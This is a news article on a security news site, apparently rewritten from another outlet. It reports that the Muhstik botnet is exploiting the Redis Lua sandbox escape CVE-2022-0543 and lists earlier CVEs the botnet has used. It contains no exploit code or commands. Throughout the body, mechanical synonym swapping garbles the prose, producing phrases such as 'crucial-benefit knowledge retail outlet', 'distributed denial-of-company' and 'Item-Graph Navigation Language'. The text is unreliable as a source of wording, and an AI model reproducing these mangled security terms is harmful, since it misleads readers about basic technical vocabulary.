• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
Cyber Security News

Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability

You are here: Home / General Cyber Security News / Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability
March 28, 2022

Muhstik, a botnet infamous for propagating via web application exploits, has been noticed targeting Redis servers utilizing a lately disclosed vulnerability in the databases method.

The vulnerability relates to CVE-2022-0543, a Lua sandbox escape flaw in the open-supply, in-memory, crucial-benefit knowledge retail outlet that could be abused to accomplish distant code execution on the underlying device. The vulnerability is rated 10 out of 10 for severity.

✔ Approved Seller From Our Partners
Malwarebytes Premium 2022

Protect yourself against all threads using Malwarebytes. Get Malwarebytes Premium with 60% discount from a Malwarebytes official seller SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


“Because of to a packaging issue, a distant attacker with the capacity to execute arbitrary Lua scripts could perhaps escape the Lua sandbox and execute arbitrary code on the host,” Ubuntu pointed out in an advisory introduced past month.

In accordance to telemetry details collected by Juniper Threat Labs, the attacks leveraging the new flaw are mentioned to have commenced on March 11, 2022, leading to the retrieval of a destructive shell script (“russia.sh”) from a distant server, which is then utilized to fetch and execute the botnet binaries from a further server.

Automatic GitHub Backups

Very first documented by Chinese security firm Netlab 360, Muhstik is acknowledged to be energetic since March 2018 and is monetized for carrying out coin mining actions and staging distributed denial-of-company (DDoS) attacks.

Capable of self-propagating on Linux and IoT products like GPON house router, DD-WRT router, and Tomato routers, Muhstik has been noticed weaponizing a number of flaws more than the yrs –

  • CVE-2017-10271 (CVSS score: 7.5) – An input validation vulnerability in the Oracle WebLogic Server part of Oracle Fusion Middleware
  • CVE-2018-7600 (CVSS score: 9.8) – Drupal remote code execution vulnerability
  • CVE-2019-2725 (CVSS rating: 9.8) – Oracle WebLogic Server distant code execution vulnerability
  • CVE-2021-26084 (CVSS score: 9.8) – An OGNL (Item-Graph Navigation Language) injection flaw in Atlassian Confluence, and
  • CVE-2021-44228 (CVSS score: 10.) – Apache Log4j distant code execution vulnerability (aka Log4Shell)

“This bot connects to an IRC server to receive instructions which incorporate the following: obtain documents, shell instructions, flood attacks, [and] SSH brute force,” Juniper Threat Labs researchers said in a report revealed very last week.

In gentle of energetic exploitation of the critical security flaw, consumers are really proposed to move promptly to patch their Redis services to the latest model.

Identified this posting exciting? Follow THN on Fb, Twitter  and LinkedIn to read much more unique content we put up.


Some sections of this report are sourced from:
thehackernews.com

Previous Post: «fcc adds kaspersky and chinese telecom firms to national security FCC Adds Kaspersky and Chinese Telecom Firms to National Security Threat List

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability
  • FCC Adds Kaspersky and Chinese Telecom Firms to National Security Threat List
  • Another Chinese Hacking Group Spotted Targeting Ukraine Amid Russia Invasion
  • Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability
  • DOJ Indicts Russian Gov’t Employees Over Targeting Power Sector
  • Senate Committee Questions Pentagon’s Information Restrictions
  • Florida Sheriff’s Officer Charged with Cyber-Flashing Minor
  • Major League Baseball Players’ Personal Data Stolen
  • The most secure email services of 2022
  • Utah Becomes Latest US State to Pass a Data Privacy Law

Copyright © TheCyberSecurity.News, All Rights Reserved.